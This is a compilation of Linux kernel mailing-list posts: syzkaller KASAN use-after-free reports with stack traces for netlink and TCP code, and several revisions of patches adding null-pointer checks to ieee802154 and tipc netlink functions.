apic_timer_interrupt+0x8c/0xa0 >> /arch/x86/entry/entry_64.S:454 >> [< inline >] ? atomic_add_return >> /./arch/x86/include/asm/atomic.h:156 >> [< inline >] ? kref_get /include/linux/kref.h:46 >> [] ? klist_next+0x177/0x400 /lib/klist.c:393 >> [< inline >] ? kref_get /include/linux/kref.h:46 >> [] ? klist_next+0x168/0x400 /lib/klist.c:393 >> [] class_dev_iter_next+0x8b/0xd0 /drivers/base/class.c:324 >> [] ? tty_get_pgrp+0x80/0x80 /drivers/tty/tty_io.c:2525 >> [] class_find_device+0x101/0x1c0 /drivers/base/class.c:428 >> [] ? class_for_each_device+0x1d0/0x1d0 >> /drivers/base/class.c:375 >> [< inline >] tty_get_device /drivers/tty/tty_io.c:3139 >> [] alloc_t
BUG: net/netlink: KASAN: use-after-free in netlink_sock_destruct
Hi all, I've got the following report use-after-free in netlink_sock_destruct while running syzkaller. Unfortunately no reproducer.The kernel version is 4.6 (May 15, on commit 2dcd0af568b0cf583645c8a317dd12e344b1c72a). Thanks. == BUG: KASAN: use-after-free in kfree_skb+0x28c/0x310 at addr 880036c1179c Read of size 4 by task syz-executor/21618 = BUG skbuff_head_cache (Tainted: GW ): kasan: bad access detected - Disabling lock debugging due to kernel taint INFO: Slab 0xeadb0400 objects=25 used=3 fp=0x880036c116c0 flags=0x1fffc004080 INFO: Object 0x880036c11680 @offset=5760 fp=0x Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014 0002 88006da07c40 8295f5f1 88003e0fc5c0 880036c11680 eadb0400 880036c1 88006da07c70 8171144d 88003e0fc5c0 eadb0400 880036c11680 Call Trace: [< inline >] __dump_stack /lib/dump_stack.c:15 [] dump_stack+0xb3/0x112 /lib/dump_stack.c:51 [] print_trailer+0x10d/0x190 /mm/slub.c:667 [] object_err+0x2f/0x40 /mm/slub.c:674 [< inline >] print_address_description /mm/kasan/report.c:179 [] kasan_report_error+0x218/0x530 /mm/kasan/report.c:275 [] ? debug_check_no_locks_freed+0x290/0x290 /kernel/locking/lockdep.c:4212 [< inline >] kasan_report /mm/kasan/report.c:297 [] __asan_report_load4_noabort+0x3e/0x40 /mm/kasan/report.c:317 [< inline >] ? atomic_read /include/linux/compiler.h:222 [] ? kfree_skb+0x28c/0x310 /net/core/skbuff.c:699 [< inline >] atomic_read /include/linux/compiler.h:222 [] kfree_skb+0x28c/0x310 /net/core/skbuff.c:699 [] netlink_sock_destruct+0xeb/0x2b0 /net/netlink/af_netlink.c:334 [] ? __netlink_create+0x1d0/0x1d0 /net/netlink/af_netlink.c:577 [] sk_destruct+0x4a/0x4f0 /net/core/sock.c:1429 [] __sk_free+0x57/0x200 /net/core/sock.c:1459 [] sk_free+0x30/0x40 /net/core/sock.c:1470 [< inline >] sock_put /include/net/sock.h:1506 [] deferred_put_nlk_sk+0x34/0x40 /net/netlink/af_netlink.c:652 [< inline >] __rcu_reclaim /kernel/rcu/rcu.h:118 [< inline >] rcu_do_batch /kernel/rcu/tree.c:2681 [< inline >] invoke_rcu_callbacks /kernel/rcu/tree.c:2947 [< inline >] __rcu_process_callbacks /kernel/rcu/tree.c:2914 [] rcu_process_callbacks+0xa71/0x11d0 /kernel/rcu/tree.c:2931 [< inline >] ? __rcu_reclaim /kernel/rcu/rcu.h:108 [< inline >] ? rcu_do_batch /kernel/rcu/tree.c:2681 [< inline >] ? invoke_rcu_callbacks /kernel/rcu/tree.c:2947 [< inline >] ? __rcu_process_callbacks /kernel/rcu/tree.c:2914 [] ? rcu_process_callbacks+0xa1c/0x11d0 /kernel/rcu/tree.c:2931 [] ? __netlink_deliver_tap+0x7c0/0x7c0 /net/netlink/af_netlink.c:204 [] __do_softirq+0x22b/0x8da /kernel/softirq.c:273 [< inline >] invoke_softirq /kernel/softirq.c:350 [] irq_exit+0x15d/0x190 /kernel/softirq.c:391 [< inline >] exiting_irq /./arch/x86/include/asm/apic.h:658 [] smp_apic_timer_interrupt+0x7b/0xa0 /arch/x86/kernel/apic/apic.c:932 [] apic_timer_interrupt+0x8c/0xa0 /arch/x86/entry/entry_64.S:454 [< inline >] ? atomic_add_return /./arch/x86/include/asm/atomic.h:156 [< inline >] ? kref_get /include/linux/kref.h:46 [] ? klist_next+0x177/0x400 /lib/klist.c:393 [< inline >] ? kref_get /include/linux/kref.h:46 [] ? klist_next+0x168/0x400 /lib/klist.c:393 [] class_dev_iter_next+0x8b/0xd0 /drivers/base/class.c:324 [] ? tty_get_pgrp+0x80/0x80 /drivers/tty/tty_io.c:2525 [] class_find_device+0x101/0x1c0 /drivers/base/class.c:428 [] ? class_for_each_device+0x1d0/0x1d0 /drivers/base/class.c:375 [< inline >] tty_get_device /drivers/tty/tty_io.c:3139 [] alloc_tty_struct+0x5fb/0x840 /drivers/tty/tty_io.c:3183 [] ? do_SAK_work+0x20/0x20 /drivers/tty/tty_io.c:3112 [] ? mutex_lock_interruptible_nested+0x980/0x980 ??:? [] tty_init_dev+0x78/0x4b0 /drivers/tty/tty_io.c:1532 [< inline >] tty_open_by_driver /drivers/tty/tty_io.c:2065 [] tty_open+0xd31/0x1050 /drivers/tty/tty_io.c:2113 [] ? tty_init_dev+0x4b0/0x4b0 /drivers/tty/tty_io.c:1543 [< inline >] ? spin_unlock /include/linux/spinlock.h:347 [] ? chrdev_open+0xbf/0x4c0 /fs/char_dev.c:376 [] ? tty_init_dev+0x4b0/0x4b0 /drivers/tty/tty_io.c:1543 [] chrdev_open+0x22a/0x4c0 /fs/char_dev.c:388 [] ? cdev_put+0x60/0x60 /fs/char_dev.c:338 [] ? __fsnotify_parent+0x5e/0x2b0 /fs/notify/fsnotify.c:98 [] ? security_file_open+0x89/0x190 /security/security.c:840 [] do_dentry_open+0x6a2/0xcb0 /fs/open.c:736 [] ? cdev_put+0x60/0x60 /fs/char_dev.c:338 [] vfs_open+0x113/0x210 /fs/open.c:849 [] ? may_open+0x1cd/0x260 /fs/namei.c:2776 [< inline >] do_las
[PATCH net] ieee802154: fix logic error in ieee802154_llsec_parse_dev_addr
Fix a logic error to avoid potential null pointer dereference. Signed-off-by: Baozeng Ding --- net/ieee802154/nl802154.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/net/ieee802154/nl802154.c b/net/ieee802154/nl802154.c index ca207db..116187b 100644 --- a/net/ieee802154/nl802154.c +++ b/net/ieee802154/nl802154.c @@ -1289,8 +1289,8 @@ ieee802154_llsec_parse_dev_addr(struct nlattr *nla, nl802154_dev_addr_policy)) return -EINVAL; - if (!attrs[NL802154_DEV_ADDR_ATTR_PAN_ID] && - !attrs[NL802154_DEV_ADDR_ATTR_MODE] && + if (!attrs[NL802154_DEV_ADDR_ATTR_PAN_ID] || + !attrs[NL802154_DEV_ADDR_ATTR_MODE] || !(attrs[NL802154_DEV_ADDR_ATTR_SHORT] || attrs[NL802154_DEV_ADDR_ATTR_EXTENDED])) return -EINVAL; -- 1.9.1
[PATCH net] ieee802154: fix logic error in, ieee802154_llsec_parse_dev_addr
Fix a logic error to avoid potential null pointer dereference. Signed-off-by: Baozeng Ding --- net/ieee802154/nl802154.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/net/ieee802154/nl802154.c b/net/ieee802154/nl802154.c index ca207db..116187b 100644 --- a/net/ieee802154/nl802154.c +++ b/net/ieee802154/nl802154.c @@ -1289,8 +1289,8 @@ ieee802154_llsec_parse_dev_addr(struct nlattr *nla, nl802154_dev_addr_policy)) return -EINVAL; - if (!attrs[NL802154_DEV_ADDR_ATTR_PAN_ID] && - !attrs[NL802154_DEV_ADDR_ATTR_MODE] && + if (!attrs[NL802154_DEV_ADDR_ATTR_PAN_ID] || + !attrs[NL802154_DEV_ADDR_ATTR_MODE] || !(attrs[NL802154_DEV_ADDR_ATTR_SHORT] || attrs[NL802154_DEV_ADDR_ATTR_EXTENDED])) return -EINVAL; -- 1.9.1
[PATCH v2] tipc: fix potential null pointer dereferences in some compat functions
Before calling the nla_parse_nested function, make sure the pointer to the attribute is not null. This patch fixes several potential null pointer dereference vulnerabilities in the tipc netlink functions. Signed-off-by: Baozeng Ding --- v2: declare local variable as reverse christmas tree format and make the commit log fit in 80 columns --- net/tipc/netlink_compat.c | 111 ++ 1 file changed, 93 insertions(+), 18 deletions(-) diff --git a/net/tipc/netlink_compat.c b/net/tipc/netlink_compat.c index d7d050f..72a1c8f 100644 --- a/net/tipc/netlink_compat.c +++ b/net/tipc/netlink_compat.c @@ -346,9 +346,15 @@ static int tipc_nl_compat_bearer_dump(struct tipc_nl_compat_msg *msg, struct nlattr **attrs) { struct nlattr *bearer[TIPC_NLA_BEARER_MAX + 1]; + int err; + + if (!attrs[TIPC_NLA_BEARER]) + return -EINVAL; - nla_parse_nested(bearer, TIPC_NLA_BEARER_MAX, attrs[TIPC_NLA_BEARER], -NULL); + err = nla_parse_nested(bearer, TIPC_NLA_BEARER_MAX, + attrs[TIPC_NLA_BEARER], NULL); + if (err) + return err; return tipc_add_tlv(msg->rep, TIPC_TLV_BEARER_NAME, nla_data(bearer[TIPC_NLA_BEARER_NAME]), @@ -460,14 +466,31 @@ static int tipc_nl_compat_link_stat_dump(struct tipc_nl_compat_msg *msg, struct nlattr *link[TIPC_NLA_LINK_MAX + 1]; struct nlattr *prop[TIPC_NLA_PROP_MAX + 1]; struct nlattr *stats[TIPC_NLA_STATS_MAX + 1]; + int err; - nla_parse_nested(link, TIPC_NLA_LINK_MAX, attrs[TIPC_NLA_LINK], NULL); + if (!attrs[TIPC_NLA_LINK]) + return -EINVAL; - nla_parse_nested(prop, TIPC_NLA_PROP_MAX, link[TIPC_NLA_LINK_PROP], -NULL); + err = nla_parse_nested(link, TIPC_NLA_LINK_MAX, attrs[TIPC_NLA_LINK], + NULL); + if (err) + return err; + + if (!link[TIPC_NLA_LINK_PROP]) + return -EINVAL; - nla_parse_nested(stats, TIPC_NLA_STATS_MAX, link[TIPC_NLA_LINK_STATS], -NULL); + err = nla_parse_nested(prop, TIPC_NLA_PROP_MAX, + link[TIPC_NLA_LINK_PROP], NULL); + if (err) + return err; + + if (!link[TIPC_NLA_LINK_STATS]) + return -EINVAL; + + err = nla_parse_nested(stats, TIPC_NLA_STATS_MAX, + link[TIPC_NLA_LINK_STATS], NULL); + if (err) + return err; name = (char *)TLV_DATA(msg->req); if (strcmp(name, nla_data(link[TIPC_NLA_LINK_NAME])) != 0) @@ -569,8 +592,15 @@ static int tipc_nl_compat_link_dump(struct tipc_nl_compat_msg *msg, { struct nlattr *link[TIPC_NLA_LINK_MAX + 1]; struct tipc_link_info link_info; + int err; - nla_parse_nested(link, TIPC_NLA_LINK_MAX, attrs[TIPC_NLA_LINK], NULL); + if (!attrs[TIPC_NLA_LINK]) + return -EINVAL; + + err = nla_parse_nested(link, TIPC_NLA_LINK_MAX, attrs[TIPC_NLA_LINK], + NULL); + if (err) + return err; link_info.dest = nla_get_flag(link[TIPC_NLA_LINK_DEST]); link_info.up = htonl(nla_get_flag(link[TIPC_NLA_LINK_UP])); @@ -758,12 +788,23 @@ static int tipc_nl_compat_name_table_dump(struct tipc_nl_compat_msg *msg, u32 node, depth, type, lowbound, upbound; static const char * const scope_str[] = {"", " zone", " cluster", " node"}; + int err; - nla_parse_nested(nt, TIPC_NLA_NAME_TABLE_MAX, -attrs[TIPC_NLA_NAME_TABLE], NULL); + if (!attrs[TIPC_NLA_NAME_TABLE]) + return -EINVAL; - nla_parse_nested(publ, TIPC_NLA_PUBL_MAX, nt[TIPC_NLA_NAME_TABLE_PUBL], -NULL); + err = nla_parse_nested(nt, TIPC_NLA_NAME_TABLE_MAX, + attrs[TIPC_NLA_NAME_TABLE], NULL); + if (err) + return err; + + if (!nt[TIPC_NLA_NAME_TABLE_PUBL]) + return -EINVAL; + + err = nla_parse_nested(publ, TIPC_NLA_PUBL_MAX, + nt[TIPC_NLA_NAME_TABLE_PUBL], NULL); + if (err) + return err; ntq = (struct tipc_name_table_query *)TLV_DATA(msg->req); @@ -815,8 +856,15 @@ static int __tipc_nl_compat_publ_dump(struct tipc_nl_compat_msg *msg, { u32 type, lower, upper; struct nlattr *publ[TIPC_NLA_PUBL_MAX + 1]; + int err; - nla_parse_nested(publ, TIPC_NLA_PUBL_MAX, attrs[TIPC_NLA_PUBL], NULL); + if (!attrs[TIPC_NLA_PUBL]) + return -EINVAL; + + err = nla_parse_nested(publ, TIPC_NLA_PUBL_MAX, attrs[TIPC_NLA_PUBL], + N
[PATCH net] tipc: fix potential null-ptr dereference bugs in netlink compat functions
Before calling the nla_parse_nested function, its third argument should be checked to make sure it is not null. This patch fixes several potential null pointer dereference vulnerabilities in the tipc netlink functions. Signed-off-by: Baozeng Ding --- net/tipc/netlink_compat.c | 111 ++ 1 file changed, 93 insertions(+), 18 deletions(-) diff --git a/net/tipc/netlink_compat.c b/net/tipc/netlink_compat.c index 4dfc5c1..1e18b78 100644 --- a/net/tipc/netlink_compat.c +++ b/net/tipc/netlink_compat.c @@ -345,10 +345,16 @@ static int tipc_nl_compat_doit(struct tipc_nl_compat_cmd_doit *cmd, static int tipc_nl_compat_bearer_dump(struct tipc_nl_compat_msg *msg, struct nlattr **attrs) { + int err; struct nlattr *bearer[TIPC_NLA_BEARER_MAX + 1]; - nla_parse_nested(bearer, TIPC_NLA_BEARER_MAX, attrs[TIPC_NLA_BEARER], -NULL); + if (!attrs[TIPC_NLA_BEARER]) + return -EINVAL; + + err = nla_parse_nested(bearer, TIPC_NLA_BEARER_MAX, + attrs[TIPC_NLA_BEARER], NULL); + if (err) + return err; return tipc_add_tlv(msg->rep, TIPC_TLV_BEARER_NAME, nla_data(bearer[TIPC_NLA_BEARER_NAME]), @@ -456,18 +462,35 @@ static void __fill_bc_link_stat(struct tipc_nl_compat_msg *msg, static int tipc_nl_compat_link_stat_dump(struct tipc_nl_compat_msg *msg, struct nlattr **attrs) { + int err; char *name; struct nlattr *link[TIPC_NLA_LINK_MAX + 1]; struct nlattr *prop[TIPC_NLA_PROP_MAX + 1]; struct nlattr *stats[TIPC_NLA_STATS_MAX + 1]; - nla_parse_nested(link, TIPC_NLA_LINK_MAX, attrs[TIPC_NLA_LINK], NULL); + if (!attrs[TIPC_NLA_LINK]) + return -EINVAL; - nla_parse_nested(prop, TIPC_NLA_PROP_MAX, link[TIPC_NLA_LINK_PROP], -NULL); + err = nla_parse_nested(link, TIPC_NLA_LINK_MAX, + attrs[TIPC_NLA_LINK], NULL); + if (err) + return err; + + if (!link[TIPC_NLA_LINK_PROP]) + return -EINVAL; - nla_parse_nested(stats, TIPC_NLA_STATS_MAX, link[TIPC_NLA_LINK_STATS], -NULL); + err = nla_parse_nested(prop, TIPC_NLA_PROP_MAX, + link[TIPC_NLA_LINK_PROP], NULL); + if (err) + return err; + + if (!link[TIPC_NLA_LINK_STATS]) + return -EINVAL; + + err = nla_parse_nested(stats, TIPC_NLA_STATS_MAX, + link[TIPC_NLA_LINK_STATS], NULL); + if (err) + return err; name = (char *)TLV_DATA(msg->req); if (strcmp(name, nla_data(link[TIPC_NLA_LINK_NAME])) != 0) @@ -567,10 +590,17 @@ static int tipc_nl_compat_link_stat_dump(struct tipc_nl_compat_msg *msg, static int tipc_nl_compat_link_dump(struct tipc_nl_compat_msg *msg, struct nlattr **attrs) { + int err; struct nlattr *link[TIPC_NLA_LINK_MAX + 1]; struct tipc_link_info link_info; - nla_parse_nested(link, TIPC_NLA_LINK_MAX, attrs[TIPC_NLA_LINK], NULL); + if (!attrs[TIPC_NLA_LINK]) + return -EINVAL; + + err = nla_parse_nested(link, TIPC_NLA_LINK_MAX, + attrs[TIPC_NLA_LINK], NULL); + if (err) + return err; link_info.dest = nla_get_flag(link[TIPC_NLA_LINK_DEST]); link_info.up = htonl(nla_get_flag(link[TIPC_NLA_LINK_UP])); @@ -751,6 +781,7 @@ static int tipc_nl_compat_name_table_dump_header(struct tipc_nl_compat_msg *msg) static int tipc_nl_compat_name_table_dump(struct tipc_nl_compat_msg *msg, struct nlattr **attrs) { + int err; char port_str[27]; struct tipc_name_table_query *ntq; struct nlattr *nt[TIPC_NLA_NAME_TABLE_MAX + 1]; @@ -759,11 +790,21 @@ static int tipc_nl_compat_name_table_dump(struct tipc_nl_compat_msg *msg, static const char * const scope_str[] = {"", " zone", " cluster", " node"}; - nla_parse_nested(nt, TIPC_NLA_NAME_TABLE_MAX, -attrs[TIPC_NLA_NAME_TABLE], NULL); + if (!attrs[TIPC_NLA_NAME_TABLE]) + return -EINVAL; - nla_parse_nested(publ, TIPC_NLA_PUBL_MAX, nt[TIPC_NLA_NAME_TABLE_PUBL], -NULL); + err = nla_parse_nested(nt, TIPC_NLA_NAME_TABLE_MAX, + attrs[TIPC_NLA_NAME_TABLE], NULL); + if (err) + return err; + + if (!nt[TIPC_NLA_NAME_TABLE_PUBL]) + return -EINVAL; + + err = nla_parse_nested(publ, TIPC_NLA_PUBL_MAX, + nt[TIPC_NLA_NAME_TABLE_PUBL], NULL
[PATCH net] tipc: fix potential null pointer dereference in some compat, functions
Before calling the nla_parse_nested function, make sure the pointer to the attribute is not null. This patch fixes several potential null pointer dereference vulnerabilities in the tipc netlink functions. Signed-off-by: Baozeng Ding --- net/tipc/netlink_compat.c | 111 ++ 1 file changed, 93 insertions(+), 18 deletions(-) diff --git a/net/tipc/netlink_compat.c b/net/tipc/netlink_compat.c index 4dfc5c1..1e18b78 100644 --- a/net/tipc/netlink_compat.c +++ b/net/tipc/netlink_compat.c @@ -345,10 +345,16 @@ static int tipc_nl_compat_doit(struct tipc_nl_compat_cmd_doit *cmd, static int tipc_nl_compat_bearer_dump(struct tipc_nl_compat_msg *msg, struct nlattr **attrs) { + int err; struct nlattr *bearer[TIPC_NLA_BEARER_MAX + 1]; - nla_parse_nested(bearer, TIPC_NLA_BEARER_MAX, attrs[TIPC_NLA_BEARER], -NULL); + if (!attrs[TIPC_NLA_BEARER]) + return -EINVAL; + + err = nla_parse_nested(bearer, TIPC_NLA_BEARER_MAX, + attrs[TIPC_NLA_BEARER], NULL); + if (err) + return err; return tipc_add_tlv(msg->rep, TIPC_TLV_BEARER_NAME, nla_data(bearer[TIPC_NLA_BEARER_NAME]), @@ -456,18 +462,35 @@ static void __fill_bc_link_stat(struct tipc_nl_compat_msg *msg, static int tipc_nl_compat_link_stat_dump(struct tipc_nl_compat_msg *msg, struct nlattr **attrs) { + int err; char *name; struct nlattr *link[TIPC_NLA_LINK_MAX + 1]; struct nlattr *prop[TIPC_NLA_PROP_MAX + 1]; struct nlattr *stats[TIPC_NLA_STATS_MAX + 1]; - nla_parse_nested(link, TIPC_NLA_LINK_MAX, attrs[TIPC_NLA_LINK], NULL); + if (!attrs[TIPC_NLA_LINK]) + return -EINVAL; - nla_parse_nested(prop, TIPC_NLA_PROP_MAX, link[TIPC_NLA_LINK_PROP], -NULL); + err = nla_parse_nested(link, TIPC_NLA_LINK_MAX, + attrs[TIPC_NLA_LINK], NULL); + if (err) + return err; + + if (!link[TIPC_NLA_LINK_PROP]) + return -EINVAL; - nla_parse_nested(stats, TIPC_NLA_STATS_MAX, link[TIPC_NLA_LINK_STATS], -NULL); + err = nla_parse_nested(prop, TIPC_NLA_PROP_MAX, + link[TIPC_NLA_LINK_PROP], NULL); + if (err) + return err; + + if (!link[TIPC_NLA_LINK_STATS]) + return -EINVAL; + + err = nla_parse_nested(stats, TIPC_NLA_STATS_MAX, + link[TIPC_NLA_LINK_STATS], NULL); + if (err) + return err; name = (char *)TLV_DATA(msg->req); if (strcmp(name, nla_data(link[TIPC_NLA_LINK_NAME])) != 0) @@ -567,10 +590,17 @@ static int tipc_nl_compat_link_stat_dump(struct tipc_nl_compat_msg *msg, static int tipc_nl_compat_link_dump(struct tipc_nl_compat_msg *msg, struct nlattr **attrs) { + int err; struct nlattr *link[TIPC_NLA_LINK_MAX + 1]; struct tipc_link_info link_info; - nla_parse_nested(link, TIPC_NLA_LINK_MAX, attrs[TIPC_NLA_LINK], NULL); + if (!attrs[TIPC_NLA_LINK]) + return -EINVAL; + + err = nla_parse_nested(link, TIPC_NLA_LINK_MAX, + attrs[TIPC_NLA_LINK], NULL); + if (err) + return err; link_info.dest = nla_get_flag(link[TIPC_NLA_LINK_DEST]); link_info.up = htonl(nla_get_flag(link[TIPC_NLA_LINK_UP])); @@ -751,6 +781,7 @@ static int tipc_nl_compat_name_table_dump_header(struct tipc_nl_compat_msg *msg) static int tipc_nl_compat_name_table_dump(struct tipc_nl_compat_msg *msg, struct nlattr **attrs) { + int err; char port_str[27]; struct tipc_name_table_query *ntq; struct nlattr *nt[TIPC_NLA_NAME_TABLE_MAX + 1]; @@ -759,11 +790,21 @@ static int tipc_nl_compat_name_table_dump(struct tipc_nl_compat_msg *msg, static const char * const scope_str[] = {"", " zone", " cluster", " node"}; - nla_parse_nested(nt, TIPC_NLA_NAME_TABLE_MAX, -attrs[TIPC_NLA_NAME_TABLE], NULL); + if (!attrs[TIPC_NLA_NAME_TABLE]) + return -EINVAL; - nla_parse_nested(publ, TIPC_NLA_PUBL_MAX, nt[TIPC_NLA_NAME_TABLE_PUBL], -NULL); + err = nla_parse_nested(nt, TIPC_NLA_NAME_TABLE_MAX, + attrs[TIPC_NLA_NAME_TABLE], NULL); + if (err) + return err; + + if (!nt[TIPC_NLA_NAME_TABLE_PUBL]) + return -EINVAL; + + err = nla_parse_nested(publ, TIPC_NLA_PUBL_MAX, + nt[TIPC_NLA_NAME_TABLE_PUBL], NULL); + if (
[PATCH] net/tipc: fix potential null pointer dereference in several tipc netlink compat functions
Before calling the nla_parse_nested funciton, its third argument should be checked to make sure it is not null. This patch fixes several potential null pointer dereference vulnerability in the tipc netlink functions. Signed-off-by: Baozeng Ding --- net/tipc/netlink_compat.c | 111 ++ 1 file changed, 93 insertions(+), 18 deletions(-) diff --git a/net/tipc/netlink_compat.c b/net/tipc/netlink_compat.c index 4dfc5c1..959e989 100644 --- a/net/tipc/netlink_compat.c +++ b/net/tipc/netlink_compat.c @@ -345,10 +345,16 @@ static int tipc_nl_compat_doit(struct tipc_nl_compat_cmd_doit *cmd, static int tipc_nl_compat_bearer_dump(struct tipc_nl_compat_msg *msg, struct nlattr **attrs) { +int err; struct nlattr *bearer[TIPC_NLA_BEARER_MAX + 1]; -nla_parse_nested(bearer, TIPC_NLA_BEARER_MAX, attrs[TIPC_NLA_BEARER], - NULL); +if (!attrs[TIPC_NLA_BEARER]) +return -EINVAL; + +err = nla_parse_nested(bearer, TIPC_NLA_BEARER_MAX, + attrs[TIPC_NLA_BEARER], NULL); +if (err) +return err; return tipc_add_tlv(msg->rep, TIPC_TLV_BEARER_NAME, nla_data(bearer[TIPC_NLA_BEARER_NAME]), @@ -456,18 +462,35 @@ static void __fill_bc_link_stat(struct tipc_nl_compat_msg *msg, static int tipc_nl_compat_link_stat_dump(struct tipc_nl_compat_msg *msg, struct nlattr **attrs) { +int err; char *name; struct nlattr *link[TIPC_NLA_LINK_MAX + 1]; struct nlattr *prop[TIPC_NLA_PROP_MAX + 1]; struct nlattr *stats[TIPC_NLA_STATS_MAX + 1]; -nla_parse_nested(link, TIPC_NLA_LINK_MAX, attrs[TIPC_NLA_LINK], NULL); +if (!attrs[TIPC_NLA_LINK]) +return -EINVAL; -nla_parse_nested(prop, TIPC_NLA_PROP_MAX, link[TIPC_NLA_LINK_PROP], - NULL); +err = nla_parse_nested(link, TIPC_NLA_LINK_MAX, + attrs[TIPC_NLA_LINK], NULL); +if (err) +return err; + +if (!link[TIPC_NLA_LINK_PROP]) +return -EINVAL; -nla_parse_nested(stats, TIPC_NLA_STATS_MAX, link[TIPC_NLA_LINK_STATS], - NULL); +err = nla_parse_nested(prop, TIPC_NLA_PROP_MAX, + link[TIPC_NLA_LINK_PROP], NULL); +if (err) +return err; + +if (!link[TIPC_NLA_LINK_STATS]) +return -EINVAL; + +err = nla_parse_nested(stats, TIPC_NLA_STATS_MAX, + link[TIPC_NLA_LINK_STATS], NULL); +if (err) +return err; name = (char *)TLV_DATA(msg->req); if (strcmp(name, nla_data(link[TIPC_NLA_LINK_NAME])) != 0) @@ -567,10 +590,17 @@ static int tipc_nl_compat_link_stat_dump(struct tipc_nl_compat_msg *msg, static int tipc_nl_compat_link_dump(struct tipc_nl_compat_msg *msg, struct nlattr **attrs) { +int err; struct nlattr *link[TIPC_NLA_LINK_MAX + 1]; struct tipc_link_info link_info; -nla_parse_nested(link, TIPC_NLA_LINK_MAX, attrs[TIPC_NLA_LINK], NULL); +if (!attrs[TIPC_NLA_LINK]) +return -EINVAL; + +err = nla_parse_nested(link, TIPC_NLA_LINK_MAX, + attrs[TIPC_NLA_LINK], NULL); +if (err) +return err; link_info.dest = nla_get_flag(link[TIPC_NLA_LINK_DEST]); link_info.up = htonl(nla_get_flag(link[TIPC_NLA_LINK_UP])); @@ -751,6 +781,7 @@ static int tipc_nl_compat_name_table_dump_header(struct tipc_nl_compat_msg *msg) static int tipc_nl_compat_name_table_dump(struct tipc_nl_compat_msg *msg, struct nlattr **attrs) { +int err; char port_str[27]; struct tipc_name_table_query *ntq; struct nlattr *nt[TIPC_NLA_NAME_TABLE_MAX + 1]; @@ -759,11 +790,21 @@ static int tipc_nl_compat_name_table_dump(struct tipc_nl_compat_msg *msg, static const char * const scope_str[] = {"", " zone", " cluster", " node"}; -nla_parse_nested(nt, TIPC_NLA_NAME_TABLE_MAX, - attrs[TIPC_NLA_NAME_TABLE], NULL); +if (!attrs[TIPC_NLA_NAME_TABLE]) +return -EINVAL; -nla_parse_nested(publ, TIPC_NLA_PUBL_MAX, nt[TIPC_NLA_NAME_TABLE_PUBL], - NULL); +err = nla_parse_nested(nt, TIPC_NLA_NAME_TABLE_MAX, + attrs[TIPC_NLA_NAME_TABLE], NULL); +if (err) +return err; + +if (!attrs[TIPC_NLA_NAME_TABLE]) +return -EINVAL; + +err = nla_parse_nested(publ, TIPC_NLA_PUBL_MAX, + nt[TIPC_NLA_NAME_TABLE_PUBL], NULL); +if (err) +return err; ntq = (struct tipc_name_table_query *)TLV_DATA(msg->req); @@ -813,10 +854,17 @@ out: static int __tipc_nl_compat_publ_dump(struct tipc_nl_compat_msg *msg, struct nlattr **attrs) { +int err; u32 type, lower, upper; struct nlattr *publ[TIPC_NLA_PUBL_MAX + 1]; -nla_parse_nested(publ, TIPC_NLA_PUBL_MAX, attrs[TIPC_NLA_PUBL], NULL); +if (!attrs[TIPC_NLA_PUBL]) +r
BUG: net/ipv4: KASAN: use-after-free in tcp_sendmsg
around the buggy address: 880038027880: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc 880038027900: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc >880038027980: fc fc fc fc fc fc fc fc fb fb fb fb fb fb fb fb ^ 880038027a00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb 880038027a80: fb fb fb fb fc fc fc fc fc fc fc fc fc fc fc fc == Best Regards, Baozeng Ding
BUG: net/ipv4: KASAN: use-after-free in tcp_v4_rcv
nal+0x1b5/0x390 net/core/dev.c:4226 [< inline >] ? __net_timestamp include/linux/skbuff.h:3099 [] ? netif_receive_skb_internal+0x14a/0x390 net/core/dev.c:4207 [] ? dev_cpu_callback+0x690/0x690 net/core/dev.c:7755 [] ? dev_gro_receive+0x1d9/0x16f0 net/core/dev.c:4514 [< inline >] ? skb_is_gso include/linux/skbuff.h:3648 [] ? dev_gro_receive+0x665/0x16f0 net/core/dev.c:4426 [] ? kasan_slab_alloc+0x12/0x20 mm/kasan/kasan.c:482 [< inline >] ? trace_kmem_cache_alloc include/trace/events/kmem.h:53 [] ? kmem_cache_alloc+0x1f9/0x2f0 mm/slub.c:2587 [] ? eth_type_trans+0x2a0/0x5b0 net/ethernet/eth.c:186 [< inline >] napi_skb_finish net/core/dev.c:4553 [] napi_gro_receive+0x2c2/0x480 net/core/dev.c:4585 [< inline >] e1000_receive_skb drivers/net/ethernet/intel/e1000/e1000_main.c:4035 [] e1000_clean_rx_irq+0x440/0x1110 drivers/net/ethernet/intel/e1000/e1000_main.c:4491 [] ? e1000_enter_82542_rst+0x260/0x260 drivers/net/ethernet/intel/e1000/e1000_main.c:2148 [] e1000_clean+0xa08/0x24a0 drivers/net/ethernet/intel/e1000/e1000_main.c:3836 [] ? check_preempt_wakeup+0x3c9/0xa70 kernel/sched/fair.c:5411 [] ? e1000_unmap_and_free_tx_resource.isra.46+0x3e0/0x3e0 drivers/net/ethernet/intel/e1000/e1000_main.c:1972 [] ? trace_hardirqs_off+0xd/0x10 kernel/locking/lockdep.c:2772 [] ? debug_check_no_locks_freed+0x290/0x290 kernel/locking/lockdep.c:4212 [< inline >] napi_poll net/core/dev.c:5087 [] net_rx_action+0x751/0xd80 net/core/dev.c:5152 [] ? add_interrupt_randomness+0x2bc/0x570 drivers/char/random.c:922 [] ? sk_busy_loop+0x1130/0x1130 include/trace/events/napi.h:13 [] ? handle_irq_event+0xb2/0x140 kernel/irq/handle.c:194 [< inline >] ? apic_eoi ./arch/x86/include/asm/apic.h:402 [< inline >] ? ack_APIC_irq ./arch/x86/include/asm/apic.h:446 [] ? ioapic_ack_level+0x165/0x450 arch/x86/kernel/apic/io_apic.c:1814 [< inline >] ? invoke_softirq kernel/softirq.c:350 [] ? irq_exit+0x15d/0x190 kernel/softirq.c:391 [] __do_softirq+0x22b/0x8da kernel/softirq.c:273 [< inline >] invoke_softirq kernel/softirq.c:350 [] irq_exit+0x15d/0x190 kernel/softirq.c:391 [< inline >] exiting_irq ./arch/x86/include/asm/apic.h:658 [] do_IRQ+0x86/0x1a0 arch/x86/kernel/irq.c:252 [] common_interrupt+0x8c/0x8c arch/x86/entry/entry_64.S:454 [< inline >] 